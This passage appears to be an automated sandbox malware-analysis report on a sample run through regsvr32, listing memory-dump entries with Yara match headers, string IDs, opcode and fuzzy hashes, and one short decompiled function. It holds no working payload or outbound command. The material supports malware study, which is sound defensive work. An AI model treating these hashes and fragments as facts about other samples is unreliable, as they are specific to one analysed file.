                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: =K$d%
                                                                                                          • API String ID: 0-2790768846
                                                                                                          • Opcode ID: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                                          • Instruction ID: 28adb4222c45faa8585d28373f0a5df690ae1a1198e2e9495ab83ae584678969
                                                                                                          • Opcode Fuzzy Hash: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                                          • Instruction Fuzzy Hash: 9F41E4B090074E8BDF48CF64C88A5DE7BF0FB58358F104A1DE86AA6250D3B89665CF85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #|$`
                                                                                                          • API String ID: 0-1687004633
                                                                                                          • Opcode ID: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                                          • Instruction ID: aca352d30c1710882d5150874fb3f177ca9e4d17341f1d00749e967c71e1e21e
                                                                                                          • Opcode Fuzzy Hash: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                                          • Instruction Fuzzy Hash: 6F41D5B190078E8FDF88DF68C88A4DE7BF0FB58358F014619F856A6250D3B89665CF85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: c$j~;
                                                                                                          • API String ID: 0-3832213246
                                                                                                          • Opcode ID: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                                          • Instruction ID: 7addeab053b021816dc2836ae66b99ed4721977e6daab71579ed0fe62a47d5e3
                                                                                                          • Opcode Fuzzy Hash: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                                          • Instruction Fuzzy Hash: 5A41A5B080078E8FDB88DF64C88A1DF7BB0FB54358F104A19EC6696250D3B49661CFD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: -h$W
                                                                                                          • API String ID: 0-4146498651
                                                                                                          • Opcode ID: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                                          • Instruction ID: 848de75311c5b3ace751814bc2a2574fb7404d3dce6aae7b38c8e2eadbd76a26
                                                                                                          • Opcode Fuzzy Hash: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                                          • Instruction Fuzzy Hash: EF41A4B590038E9FDB44CF68D88A5CE7BF0FB48358F114619F869A6250D3B49664CF85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: .$fp
                                                                                                          • API String ID: 0-3298127435
                                                                                                          • Opcode ID: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                                          • Instruction ID: 7d81ee61e7f475754483079d681500086d35f184053cfc24a8581ff684add4b2
                                                                                                          • Opcode Fuzzy Hash: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                                          • Instruction Fuzzy Hash: 7F41F4B190470E8BDB88CF64C48A4DE7FB0FB28398F104619E856A6290D3B89665CFC4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: "$Zs
                                                                                                          • API String ID: 0-3922668666
                                                                                                          • Opcode ID: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                                          • Instruction ID: f1d62621bd08a38fa15a490595be93b85bae5397fb0987493b8f1264ce03d9fe
                                                                                                          • Opcode Fuzzy Hash: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                                          • Instruction Fuzzy Hash: 803192B0529380ABC388DF28D19A91EBBE1FBD5708F806A1DF8C286390D374D406CB43
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: XW$s [
                                                                                                          • API String ID: 0-2366283936
                                                                                                          • Opcode ID: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                                          • Instruction ID: c8620a86b0501fca327921337904d07bbca0ac58b79dbc40019122cd377fd21c
                                                                                                          • Opcode Fuzzy Hash: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                                          • Instruction Fuzzy Hash: 623190B190478E8FDF48DF28D88949A3BE1FB48304B004A1DFC6AD7250D7B4D665CB95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4V$jn(
                                                                                                          • API String ID: 0-2529302498
                                                                                                          • Opcode ID: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                                          • Instruction ID: cb5d544f3b4b9f04c9dfd671481ec3bad593690e5eb4dddf862df6e3aa1dae86
                                                                                                          • Opcode Fuzzy Hash: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                                          • Instruction Fuzzy Hash: 17317EB1529381AFC398CF28C48A91ABBE0FBC9318F806A1DF8C686260D774D555CB02
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: '$%6
                                                                                                          • API String ID: 0-1852427169
                                                                                                          • Opcode ID: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                                          • Instruction ID: 05249663a0179330ad45d21934dcfd5c9628912d79576b4f5c22a08ed84997fc
                                                                                                          • Opcode Fuzzy Hash: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                                          • Instruction Fuzzy Hash: CD316FB5568381ABD388DF28C48A81ABBF1FB89308F806A1DF8C6DB251D775D545CB43
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: uS$J
                                                                                                          • API String ID: 0-437994327
                                                                                                          • Opcode ID: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                                          • Instruction ID: e670e8ed643aa6198d6f91df9d226353ae2ea293bd51abbecf15ed6662a1f808
                                                                                                          • Opcode Fuzzy Hash: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                                          • Instruction Fuzzy Hash: C331D7B190074E8FDB84DF64C88A5DE7FB0FF28358F104619E859A6260E3B88695CFD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: +@$`.P
                                                                                                          • API String ID: 0-1189405855
                                                                                                          • Opcode ID: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                                          • Instruction ID: 39de2ea6a026fc69778914cf9e44a5f31bb4615b8119a4e03ad8497b2faa6ad6
                                                                                                          • Opcode Fuzzy Hash: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                                          • Instruction Fuzzy Hash: A1316FB15187848FD348DF28C45941BBBE1BB9C758F804B1DF4CAAA260D778D645CF4A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ^$R
                                                                                                          • API String ID: 0-3595634639
                                                                                                          • Opcode ID: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                                          • Instruction ID: 7dec6e6ff202478201587024085261afee01554c9ae7569198c8fcb843946a7e
                                                                                                          • Opcode Fuzzy Hash: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                                          • Instruction Fuzzy Hash: 112180B0528781AFC398DF28D49591FBBF1BB88744F806A1DF8C686390D779D505CB46
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: t^$w
                                                                                                          • API String ID: 0-1486493484
                                                                                                          • Opcode ID: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                          • Instruction ID: 0fcab25796e593e8dfb7fafe86ea51ff53beb953310655f2f877b1f2b437242d
                                                                                                          • Opcode Fuzzy Hash: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                          • Instruction Fuzzy Hash: B1219DB090078E8FDB48DF68D8491DE7BB0FB18308F014A59F82996290D3B89665CF85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #
                                                                                                          • API String ID: 0-606707520
                                                                                                          • Opcode ID: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                          • Instruction ID: e196c01b70a6c807127fda86dfa1a0223b038a37baf5ea8fddd68b8de5dafcb3
                                                                                                          • Opcode Fuzzy Hash: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                          • Instruction Fuzzy Hash: BF221670914709EFDF58DFA8C49A49EBBF1FB44348F00816DE84AAB290D7749B19CB85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00000001180008D28(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
                                                                                                          				signed long long _t25;
                                                                                                          				void* _t27;
                                                                                                          				void* _t30;
                                                                                                          
                                                                                                          				 *((long long*)(_t30 + 8)) = __rbx;
                                                                                                          				 *(_t30 + 0x10) = _t25;
                                                                                                          				 *((long long*)(_t30 + 0x18)) = __rsi;
                                                                                                          				_t27 = (_t25 | 0xffffffff) + 1;
                                                                                                          				if ( *((intOrPtr*)(__rcx + _t27)) != dil) goto 0x80008d56;
                                                                                                          				if (_t27 + __rdx -  !__r8 <= 0) goto 0x80008d92;
                                                                                                          				return __rdx + 0xb;
                                                                                                          			}






                                                                                                          0x180008d28
                                                                                                          0x180008d2d
                                                                                                          0x180008d32
                                                                                                          0x180008d56
                                                                                                          0x180008d5d
                                                                                                          0x180008d70
                                                                                                          0x180008d91

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
                                                                                                          • Instruction ID: 1f7af7de608e037a3e69fafdab2b7a4d19b0596ea53e23cf5e8b59c7fdfa90c1
                                                                                                          • Opcode Fuzzy Hash: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
                                                                                                          • Instruction Fuzzy Hash: D151C432700B9489FBA1DB72A8447DE7BA1B7587D4F148225FE9827B99DF38C605D700
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ef
                                                                                                          • API String ID: 0-3522424648
                                                                                                          • Opcode ID: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                                          • Instruction ID: 218d32ba965aecdc444772f06041b55750188ebc852e2316c8b6794b22009c15
                                                                                                          • Opcode Fuzzy Hash: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                                          • Instruction Fuzzy Hash: 6F021870A04709EFDF58DF68C08A59EBBF2FB44304F00816DE84AAB260D775DA59CB85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: x]!-
                                                                                                          • API String ID: 0-585868058
                                                                                                          • Opcode ID: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                                          • Instruction ID: eea251905d7c36f19b81c911e584b14bcb3599f99719aa1e93460a918b3d7777
                                                                                                          • Opcode Fuzzy Hash: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                                          • Instruction Fuzzy Hash: A3D189B1A0060DCFDBA8CF78C54A5DD7BF1FB48308F606129E826AA2B6D7749905CF54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: }^O
                                                                                                          • API String ID: 0-3039680174
                                                                                                          • Opcode ID: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                                          • Instruction ID: f2cefafd534790b6d42458c47c3941a47ecd628844fb7b7bab6f01c2f00d0ab8
                                                                                                          • Opcode Fuzzy Hash: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                                          • Instruction Fuzzy Hash: 93A17BB2502749CFDB98DF28C69A59D3BE1FF55308F004129FC1E9A2A0D3B4E925CB49
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RH
                                                                                                          • API String ID: 0-2975065227
                                                                                                          • Opcode ID: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
                                                                                                          • Instruction ID: c9c8136aa2762dc38438ef7793ad949a778d5616d06d1cc9c9dee255cb961fd2
                                                                                                          • Opcode Fuzzy Hash: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
                                                                                                          • Instruction Fuzzy Hash: FB512B7111C7448FC7A8DF18D4C66AAB7E0FB94310F90991DE8CEC7251DF74A88A9B46
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Y
                                                                                                          • API String ID: 0-579211002
                                                                                                          • Opcode ID: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
                                                                                                          • Instruction ID: 6dd34836eb8d05d7cd41000d7d98ec7cb4f4b0e75cf562b2aad00ab7e72765e7
                                                                                                          • Opcode Fuzzy Hash: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
                                                                                                          • Instruction Fuzzy Hash: 7651F4715107898BDB58DF28C88A0DD3BA1FB4935CF024328FD9EA62A1D77CD845CB49
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: vOs
                                                                                                          • API String ID: 0-1852020951
                                                                                                          • Opcode ID: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
                                                                                                          • Instruction ID: 2afcdc48c9cf7917d9464c8a9cf7fc14826b72490ed42be512a056d0be39fbea
                                                                                                          • Opcode Fuzzy Hash: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
                                                                                                          • Instruction Fuzzy Hash: 17619DB190030E8FDB49CF68D48A5CE7FB0FB24398F204519F845A6260D7B896A8CFD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: *)
                                                                                                          • API String ID: 0-1811957435
                                                                                                          • Opcode ID: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
                                                                                                          • Instruction ID: 322a80236b8a14140be482bd133293d338b55ae9df4a44b5fde2bb4fde139e1e
                                                                                                          • Opcode Fuzzy Hash: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
                                                                                                          • Instruction Fuzzy Hash: 4F31733061CB898FC72CDF29D09556AB7E0FB99305F504A6EE58AC7365DB70D805CB82
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: t
                                                                                                          • API String ID: 0-1935021737
                                                                                                          • Opcode ID: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
                                                                                                          • Instruction ID: 6478af6df486842ddebd7670da41173722a93eaa13f76481ce816d1e1d47f136
                                                                                                          • Opcode Fuzzy Hash: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
                                                                                                          • Instruction Fuzzy Hash: 0331913011CB448FE768EF2CD48916ABBE0FB96344F104A6DE5CAC7266D770D805CB82
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: __
                                                                                                          • API String ID: 0-2267946753
                                                                                                          • Opcode ID: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
                                                                                                          • Instruction ID: 1b31f8ee11ac5ba040a79a5472ecfda1527a69b048a249ff591058e805247070
                                                                                                          • Opcode Fuzzy Hash: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
                                                                                                          • Instruction Fuzzy Hash: 5141E070508B848BE758DF29C18A41ABBF1FBC9748F504A2DF69A87364C775D845CB42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: GSn
                                                                                                          • API String ID: 0-1733515909
                                                                                                          • Opcode ID: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
                                                                                                          • Instruction ID: 005723994a97e926dd91b81018bc425355ab269c9499687dd580b1857e50f51c
                                                                                                          • Opcode Fuzzy Hash: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
                                                                                                          • Instruction Fuzzy Hash: 3351C6B090078E8FDF48DF64C84A5DE7BB1FB58358F104A1DEC66A6290D3B89664CF84
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 8=
                                                                                                          • API String ID: 0-237953557
                                                                                                          • Opcode ID: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
                                                                                                          • Instruction ID: cb408feaea32adfe4a4fbf7e3d04d8d16b8a3fec0031bafc7857eb33351922d5
                                                                                                          • Opcode Fuzzy Hash: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
                                                                                                          • Instruction Fuzzy Hash: C2314B70608B458BDB5CDF2CC49912ABAE1FBD9300F448A2DF58AD7365DB34D845CB82
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: K
                                                                                                          • API String ID: 0-425913083
                                                                                                          • Opcode ID: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
                                                                                                          • Instruction ID: 7bbdfc6e73210d1e2435677de4fb7cb1576280f14d1d76a94a774358f879a881
                                                                                                          • Opcode Fuzzy Hash: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
                                                                                                          • Instruction Fuzzy Hash: 5741F7B180438ECFDB48CF68D8864DE7BB0FB58348F114A19F866A6250D3B8D665CF85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
